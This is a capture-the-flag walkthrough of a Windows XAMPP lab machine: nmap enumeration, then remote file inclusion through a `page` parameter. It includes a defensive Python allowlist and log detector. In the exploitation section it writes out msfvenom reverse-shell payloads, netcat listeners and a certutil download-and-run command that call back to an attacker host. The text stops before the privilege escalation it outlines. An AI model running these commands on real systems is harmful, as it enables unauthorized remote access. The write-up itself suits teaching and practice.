# Slort

## Summary

### General information

|             |                                               |
| ----------- | --------------------------------------------- |
| **Level**   | <mark style="color:orange;">Intermediate</mark> |
| **System**  | Windows                                         |

### Spoiler! - Roadmap

1. Among the services there is a web application with a `/site` path that redirects to `/site/index.php?page=main.php`.
2. The `page` parameter turns out to be vulnerable to RFI, and through it we include a URL pointing to our `reverse shell` written in `php`.
3. While enumerating the server, the `C:\Backup` folder holds information about a task that runs a binary called `TFTP.exe` every 5 minutes, and we see that our user has permission to modify it.
4. We create an EXE with the same name as the file the task runs and replace it on the system.
5. We wait for the task to run and PWNED! }:)

## Enumeration

### nmap scan

Basic enumeration of all services over TCP, UDP and SCTP:

```bash
IP=192.168.198.53
nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP
```

Port and service scan with scripts against the top 1000 ports over TCP and UDP, and against all ports over TCP:

```bash
nmap -T4 -Pn --open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn --open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn --open -sU -sV -oA nmap/udp-1000 $IP
```

#### nmap results

The second scan (`nmap -T4 -Pn --open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP`) gives us the following information:

```
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| vulners: 
|   cpe:/a:filezilla-project:filezilla_server:0.9.41_beta: 
|       VMSA-2008-0016.3        10.0    https://vulners.com/vmware/VMSA-2008-0016.3
|       VMSA-2008-0014.3        10.0    https://vulners.com/vmware/VMSA-2008-0014.3
|       SSV:3950        10.0    https://vulners.com/seebug/SSV:3950     *EXPLOIT*
|       SSV:11998       10.0    https://vulners.com/seebug/SSV:11998    *EXPLOIT*
|       SAINT:D25EA3A9ECECCE0EAAD76756E80C2619  10.0    https://vulners.com/saint/SAINT:D25EA3A9ECECCE0EAAD76756E80C2619        *EXPLOIT*
|       SAINT:98424EE013ADB3A8F0D1BE842CCABF10  10.0    https://vulners.com/saint/SAINT:98424EE013ADB3A8F0D1BE842CCABF10        *EXPLOIT*
|       SAINT:630A6964630CDBFFE209380927EB5D13  10.0    https://vulners.com/saint/SAINT:630A6964630CDBFFE209380927EB5D13        *EXPLOIT*
|       SAINT:09352C87FBB0235129E935BA72121479  10.0    https://vulners.com/saint/SAINT:09352C87FBB0235129E935BA72121479        *EXPLOIT*
|       D2SEC_JAVAWS2   10.0    https://vulners.com/d2/D2SEC_JAVAWS2    *EXPLOIT*
|       VMSA-2009-0005  9.3     https://vulners.com/vmware/VMSA-2009-0005
|       VMSA-2008-0018  9.3     https://vulners.com/vmware/VMSA-2008-0018
|       SSV:5025        9.3     https://vulners.com/seebug/SSV:5025     *EXPLOIT*
|       SSV:5005        9.3     https://vulners.com/seebug/SSV:5005     *EXPLOIT*
|       SSV:4423        9.3     https://vulners.com/seebug/SSV:4423     *EXPLOIT*
|       VMSA-2009-0007  7.5     https://vulners.com/vmware/VMSA-2009-0007
|       SSV:3423        7.5     https://vulners.com/seebug/SSV:3423     *EXPLOIT*
|       SSV:3166        7.5     https://vulners.com/seebug/SSV:3166     *EXPLOIT*
|       PACKETSTORM:64260       7.5     https://vulners.com/packetstorm/PACKETSTORM:64260       *EXPLOIT*
|       VMSA-2008-0019.1        7.2     https://vulners.com/vmware/VMSA-2008-0019.1
|       SSV:4528        7.2     https://vulners.com/seebug/SSV:4528     *EXPLOIT*
|       SSV:3948        7.2     https://vulners.com/seebug/SSV:3948     *EXPLOIT*
|       VMSA-2009-0015  6.9     https://vulners.com/vmware/VMSA-2009-0015
|       SSV:4422        6.9     https://vulners.com/seebug/SSV:4422     *EXPLOIT*
|       SSV:14961       6.9     https://vulners.com/seebug/SSV:14961    *EXPLOIT*
|       SSV:12550       6.9     https://vulners.com/seebug/SSV:12550    *EXPLOIT*
|       SSV:12541       6.9     https://vulners.com/seebug/SSV:12541    *EXPLOIT*
|       VMSA-2009-0006  6.8     https://vulners.com/vmware/VMSA-2009-0006
|       SSV:12093       6.8     https://vulners.com/seebug/SSV:12093    *EXPLOIT*
|       CLOUDBURST      6.8     https://vulners.com/canvas/CLOUDBURST   *EXPLOIT*
|       SSV:9178        5.0     https://vulners.com/seebug/SSV:9178     *EXPLOIT*
|       SSV:9168        5.0     https://vulners.com/seebug/SSV:9168     *EXPLOIT*
|       SSV:9165        5.0     https://vulners.com/seebug/SSV:9165     *EXPLOIT*
|       SSV:86539       5.0     https://vulners.com/seebug/SSV:86539    *EXPLOIT*
|       SSV:65607       5.0     https://vulners.com/seebug/SSV:65607    *EXPLOIT*
|       SSV:3949        5.0     https://vulners.com/seebug/SSV:3949     *EXPLOIT*
|       SSV:17308       5.0     https://vulners.com/seebug/SSV:17308    *EXPLOIT*
|       PACKETSTORM:68500       5.0     https://vulners.com/packetstorm/PACKETSTORM:68500       *EXPLOIT*
|       PACKETSTORM:68473       5.0     https://vulners.com/packetstorm/PACKETSTORM:68473       *EXPLOIT*
|       PACKETSTORM:68471       5.0     https://vulners.com/packetstorm/PACKETSTORM:68471       *EXPLOIT*
|       EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF    5.0     https://vulners.com/exploitpack/EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF  *EXPLOIT*
|       EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D  *EXPLOIT*
|       EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095    5.0     https://vulners.com/exploitpack/EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095  *EXPLOIT*
|       EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D  *EXPLOIT*
|       EDB-ID:6130     5.0     https://vulners.com/exploitdb/EDB-ID:6130       *EXPLOIT*
|       EDB-ID:6123     5.0     https://vulners.com/exploitdb/EDB-ID:6123       *EXPLOIT*
|       EDB-ID:6122     5.0     https://vulners.com/exploitdb/EDB-ID:6122       *EXPLOIT*
|       E-193   5.0     https://vulners.com/dsquare/E-193       *EXPLOIT*
|       D2SEC_VMWARE_DIRTRAV    5.0     https://vulners.com/d2/D2SEC_VMWARE_DIRTRAV     *EXPLOIT*
|       D2SEC_VMWARE    5.0     https://vulners.com/d2/D2SEC_VMWARE     *EXPLOIT*
|       SSV:11498       4.0     https://vulners.com/seebug/SSV:11498    *EXPLOIT*
|_      SSV:3947        2.1     https://vulners.com/seebug/SSV:3947     *EXPLOIT*
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
| fingerprint-strings: 
|   GenericLines, JavaRMI, LDAPBindReq, NULL: 
|_    Host '192.168.45.5' is not allowed to connect to this MariaDB server
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-trace: TRACE is enabled
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:4443/dashboard/
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5040/tcp  open  unknown
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.198.53:8080/dashboard/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.198.53:8080/dashboard/javascripts/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.198.53:8080/dashboard/javascripts/?C=D%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.198.53:8080/dashboard/javascripts/?C=M%3BO%3DA%27%20OR%20sqlspider
| vulners: 
|   cpe:/a:apache:http_server:2.4.43: 
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2020-11984  7.5     https://vulners.com/cve/CVE-2020-11984
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-36160  5.0     https://vulners.com/cve/CVE-2021-36160
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-30641  5.0     https://vulners.com/cve/CVE-2021-30641
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-13950  5.0     https://vulners.com/cve/CVE-2020-13950
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       CVE-2022-37436  0.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-36760  0.0     https://vulners.com/cve/CVE-2022-36760
|_      CVE-2006-20001  0.0     https://vulners.com/cve/CVE-2006-20001
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-open-proxy: Proxy might be redirecting requests
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /icons/: Potentially interesting folder w/ directory listing
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.43 (win64) openssl/1.1.1g php/7.4.6'
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=3/4%Time=64038037%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(JavaRMI,4B,"G\0
SF:\0\x01\xffj\x04Host\x20'192\.168\.45\.5'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/4%OT=21%CT=1%CU=43728%PV=Y%DS=3%DC=T%G=Y%TM=64038244
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=102%TI=I%TS=U)OPS(O1=M54ENW8
OS:NNS%O2=M54ENW8NNS%O3=M54ENW8%O4=M54ENW8NNS%O5=M54ENW8NNS%O6=M54ENNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=99A7%RUD=G)IE(R=N)

Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
| smb2-time: 
|   date: 2023-03-04T17:33:55
|_  start_date: N/A
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
```

### Scan analysis

#### HTTP - 4443

Among the services detected, the most common ones, such as web services, among others (FTP, SMB, etc.), are usually of most interest, and it is recommended to analyse them first.

```
http://192.168.198.53:4443/
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FCEQU1GrvMCkekrHYxpEH%2FPasted%20image%2020230304190711.png?alt=media&#x26;token=5e8041dc-06d1-48f1-8964-db0044897b3e" alt=""><figcaption></figcaption></figure>

### Directory enumeration

We enumerate directories and possible files with the `html`, `php` and `txt` extensions using the `directory-list-2.3-medium.txt` wordlist:

```bash
IP=192.168.198.53
feroxbuster -t 200 -L 2 -d 2 -u http://$IP:4443/ -x html,php,txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --extract-links -o $IP-directory-list-2.3-medium-443.txt -k
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FVnxNaeaPymzsqbgLGLds%2FPasted%20image%2020230304195331.png?alt=media&#x26;token=90ab4fcb-6823-464c-acbb-894a296d2f75" alt=""><figcaption></figcaption></figure>

Accessing the `/site` path redirects to [`http://192.168.205.53:4443/site/index.php?page=main.php`](http://192.168.205.53:4443/site/index.php?page=main.php).

The `page` parameter refers to a document stored on the web server, and it is possible that this input is not properly validated, which would make it vulnerable to LFI (Local File Inclusion) or RFI (Remote File Inclusion).

An RFI would be far more useful to us, since it would let us run a webshell and/or a reverse shell, so we first test whether the parameter is vulnerable to RFI.

First, we try a simple single quote to see how the application behaves with this input:

```
http://192.168.205.53:4443/site/index.php?page=%27
```

{% tabs %}
{% tab title="Request" %}

```
GET /site/index.php?page=%27 HTTP/1.1
Host: 192.168.205.53:4443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


```

{% endtab %}

{% tab title="Response" %}

```
HTTP/1.1 200 OK
Date: Sat, 04 Mar 2023 21:20:55 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Content-Length: 316
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  include('): failed to open stream: No such file or directory in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>:  include(): Failed opening ''' for inclusion (include_path='C:\xampp\php\PEAR') in <b>C:\xampp\htdocs\site\index.php</b> on line <b>4</b><br />

```

{% endtab %}
{% endtabs %}

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FZiAimxeNJhz3vGcVDpfX%2FPasted%20image%2020230304223503.png?alt=media&#x26;token=173dcb9a-dfaf-477f-885c-90a341d67a00" alt=""><figcaption></figcaption></figure>

Indeed, the parameter is not properly secured, and we can see that the PHP `include` function is used, so we will try to include a file hosted on our own machine (RFI). Specifically, we will create a `reverse shell` and start a listener on a port.
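From the defender's side, the bug here is the classic `include($_GET['page'])` with no validation, and the warnings in the response also show that `display_errors` is on. The following is an added example (Python, not code from the original write-up) covering the two things worth taking away: an allowlist resolver that replaces the raw include, and a log check that flags requests like the ones above in Apache access logs. The allowlist (`main.php`, `about.php`, `contact.php`) and the log lines are constructed for the example; the requests are modelled on the ones made in this walkthrough.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Files that index.php is allowed to include. Constructed for this example;
# the real application's allowlist would be whatever pages actually exist.
ALLOWED_PAGES = {"main.php", "about.php", "contact.php"}

# Apache access-log line in common log format (constructed sample lines below).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Schemes PHP can fetch from when allow_url_include is on.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}


def resolve_page(page):
    """Hardened counterpart of include($_GET['page']).

    Instead of handing the request value to include(), map it onto a fixed
    allowlist and return None for anything else. A name outside the set is
    never touched, so neither local nor remote inclusion is possible.
    """
    if page is None:
        return "main.php"
    return page if page in ALLOWED_PAGES else None


def classify_page_value(page):
    """Label a raw `page` value: None when allowlisted, otherwise why it is suspicious."""
    if page in ALLOWED_PAGES:
        return None
    if "://" in page or page.lower().startswith("data:"):
        scheme = page.split(":", 1)[0].lower()
        return "remote-inclusion" if scheme in REMOTE_SCHEMES else "stream-wrapper"
    if "../" in page or "..\\" in page:
        return "path-traversal"
    return "unknown-page"


def find_inclusion_attempts(lines):
    """Scan access-log lines for requests whose `page` value is not allowlisted.

    Returns a list of (client_ip, page_value, label) for each suspicious request.
    """
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed or non-request line
        # parse_qs percent-decodes, so page=%27 is seen as the quote it really was
        values = parse_qs(urlsplit(m.group("target")).query).get("page", [])
        for value in values:
            label = classify_page_value(value)
            if label is not None:
                hits.append((m.group("ip"), value, label))
    return hits


# Constructed sample log lines modelled on the requests made in the write-up.
SAMPLE_LOG = [
    '192.168.45.5 - - [04/Mar/2023:21:18:02 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 1843',
    '192.168.45.5 - - [04/Mar/2023:21:20:55 +0000] "GET /site/index.php?page=%27 HTTP/1.1" 200 316',
    '192.168.45.5 - - [04/Mar/2023:22:42:03 +0000] "GET /site/index.php?page=http://192.168.45.5/test.php HTTP/1.1" 200 0',
    '192.168.45.5 - - [04/Mar/2023:22:43:10 +0000] "GET /site/index.php?page=../../xampp/apache/conf/httpd.conf HTTP/1.1" 200 512',
    '192.168.45.5 - - [04/Mar/2023:22:44:00 +0000] "GET /dashboard/ HTTP/1.1" 200 7201',
]

if __name__ == "__main__":
    for ip, value, label in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value}")
```

Alongside the allowlist, `allow_url_include=Off` in `php.ini` (the default since PHP 5.2) blocks remote inclusion outright, and `display_errors=Off` keeps paths such as `C:\xampp\htdocs\site\index.php` out of responses like the one shown above.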

## Exploitation

### RFI - Remote File Inclusion

Now that we have found a possible entry point, we create our reverse shell.

{% hint style="warning" %}
**Friendly reminder:** Whenever possible, use ports 53, 80 or 443. On these ports it is less likely that the `firewall` blocks the connection, so the `reverse shell` is more likely to succeed.
{% endhint %}

```
msfvenom -p php/reverse_php LHOST=192.168.45.5 LPORT=443 -f raw > test.php
```

```
python3 -m http.server 80
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2F1u5pOz2XIGeDnOqZWPdD%2FPasted%20image%2020230304224501.png?alt=media&#x26;token=02784d0f-bedd-4fac-b630-98263ac988f4" alt=""><figcaption></figcaption></figure>

```
sudo rlwrap nc -lnvp 443
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FqnEwsfs4smorRQ5N5fTT%2FPasted%20image%2020230304224514.png?alt=media&#x26;token=0c48d90c-3774-4a77-af82-53773c82282b" alt=""><figcaption></figcaption></figure>

```
http://192.168.205.53:4443/site/index.php?page=http://192.168.45.5/test.php
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FjeLDUHDmwwb3namXmURj%2FPasted%20image%2020230304224203.png?alt=media&#x26;token=9ab3a143-0056-444f-84aa-6caf463f7348" alt=""><figcaption></figcaption></figure>

And... PWNED! 8)

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2Fh0ax1auB5CDWK6fNgtzP%2FPasted%20image%2020230304224820.png?alt=media&#x26;token=80c7c28a-8aa1-48c3-a93b-ec9cf5ce63b4" alt=""><figcaption></figcaption></figure>

Now, to get a better `cmd`, we will upload an EXE. For that, we use `msfvenom` again:

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.5 LPORT=53 -f exe > r.exe
python3 -m http.server 80
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FjCUxNQTmOjiqKOSho3U0%2FPasted%20image%2020230304230924.png?alt=media&#x26;token=125bcd6d-c3cb-4db3-a571-784ec2a4a79c" alt=""><figcaption></figcaption></figure>

We start listening on port `53`:

```
sudo rlwrap nc -lnvp 53
```

On the victim machine we run the following to download the EXE and then execute it.

```
certutil.exe -urlcache -split -f "http://192.168.45.5/r.exe"
r.exe
```

